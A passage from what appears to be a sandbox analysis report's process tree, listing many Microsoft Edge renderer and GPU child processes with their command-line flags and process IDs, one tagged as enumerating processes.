    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5716 /prefetch:1
        5⤵
        
        PID:1896
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2832 /prefetch:1
        5⤵
        
        PID:4640
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4144 /prefetch:1
        5⤵
        
        PID:4588
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6392 /prefetch:2
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1220
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6444 /prefetch:1
        5⤵
        
        PID:1324
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6944 /prefetch:1
        5⤵
        
        PID:2780
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6908 /prefetch:1
        5⤵
        
        PID:3436
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:1
        5⤵
        
        PID:6108
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6036 /prefetch:1
        5⤵
        
        PID:3440
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7128 /prefetch:1
        5⤵
        
        PID:4724
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3520 /prefetch:1
        5⤵
        
        PID:6052
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6300 /prefetch:1
        5⤵
        
        PID:5108
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3736 /prefetch:1
        5⤵
        
        PID:1616
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6404 /prefetch:1
        5⤵
        
        PID:2868
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4512 /prefetch:1
        5⤵
        
        PID:1920
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6396 /prefetch:1
        5⤵
        
        PID:1640
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1
        5⤵
        
        PID:1720
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:1
        5⤵
        
        PID:5636
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6776 /prefetch:1
        5⤵
        
        PID:3996
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7080 /prefetch:1
        5⤵
        
        PID:1748
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6648 /prefetch:1
        5⤵
        
        PID:3376
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1
        5⤵
        
        PID:2916
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7352 /prefetch:1
        5⤵
        
        PID:4260
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7360 /prefetch:1
        5⤵
        
        PID:3172
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7356 /prefetch:1
        5⤵
        
        PID:2312
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7764 /prefetch:1
        5⤵
        
        PID:2420
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7628 /prefetch:1
        5⤵
        
        PID:5364
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7884 /prefetch:1
        5⤵
        
        PID:5964
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8020 /prefetch:1
        5⤵
        
        PID:2812
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8328 /prefetch:1
        5⤵
        
        PID:1732
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8800 /prefetch:1
        5⤵
        
        PID:5812
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8904 /prefetch:1
        5⤵
        
        PID:5316
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8620 /prefetch:1
        5⤵
        
        PID:3024
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8576 /prefetch:1
        5⤵
        
        PID:2868
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9316 /prefetch:1
        5⤵
        
        PID:1892
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9480 /prefetch:1
        5⤵
        
        PID:5596
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8028 /prefetch:1
        5⤵
        
        PID:3588
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1
        5⤵
        
        PID:768
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8196 /prefetch:1
        5⤵
        
        PID:5212
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8184 /prefetch:1
        5⤵
        
        PID:5036
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6452 /prefetch:1
        5⤵
        
        PID:1248
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8064 /prefetch:1
        5⤵
        
        PID:3748
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8300 /prefetch:1
        5⤵
        
        PID:2812
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9496 /prefetch:1
        5⤵
        
        PID:980
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4176 /prefetch:1
        5⤵
        
        PID:5804
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9784 /prefetch:1
        5⤵
        
        PID:4708
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9604 /prefetch:1
        5⤵
        
        PID:5644
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10068 /prefetch:1
        5⤵
        
        PID:3128
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9272 /prefetch:1
        5⤵
        
        PID:4492
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5920 /prefetch:1
        5⤵
        
        PID:3048
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9800 /prefetch:1
        5⤵
        
        PID:1144
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7244 /prefetch:1
        5⤵
        
        PID:5728
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9244 /prefetch:1
        5⤵
        
        PID:5304
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6880 /prefetch:1
        5⤵
        
        PID:5548
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8244 /prefetch:1
        5⤵
        
        PID:3904
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10312 /prefetch:1
        5⤵
        
        PID:2028
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8240 /prefetch:1
        5⤵
        
        PID:1232
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9128 /prefetch:1
        5⤵
        
        PID:1868
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10552 /prefetch:1
        5⤵
        
        PID:520
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10684 /prefetch:1
        5⤵
        
        PID:1884
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9536 /prefetch:1
        5⤵
        
        PID:6232
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10660 /prefetch:1
        5⤵
        
        PID:6408
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2755080210461145807,16355945271614062403,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10548 /prefetch:1
        5⤵
        
        PID:6840
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
